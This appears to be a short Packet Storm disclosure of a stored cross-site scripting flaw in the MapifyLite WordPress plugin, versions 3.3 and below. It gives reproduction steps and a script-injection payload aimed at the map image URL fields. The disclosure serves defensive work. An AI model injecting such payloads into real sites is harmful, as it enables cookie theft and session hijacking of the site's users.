WordPress MapifyLife plugin versions 3.3 and below suffer from a persistent cross site scripting vulnerability.
e41b2a293290512503e176f752626d6634377c72c9f00f6e053861f554f2e528#Title : MapifyLite Wordpress Plugins Stored XSS Injection
#Date : 24/03/2021
#Author : Eagle Eye
#Vendor Homepage : https://mapifypro.com/product/mapifylite/
#Version Affected : 3.3 and below
#Tested on : Google Chrome
#XSS vulnerability from Map settings & locations
#1. Login user
#2. Go to add map settins/locations
#3. Put XSS payload at image pin url / image gallery url
#payload
http://localhost/"><script>alert(document.cookie)</script>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed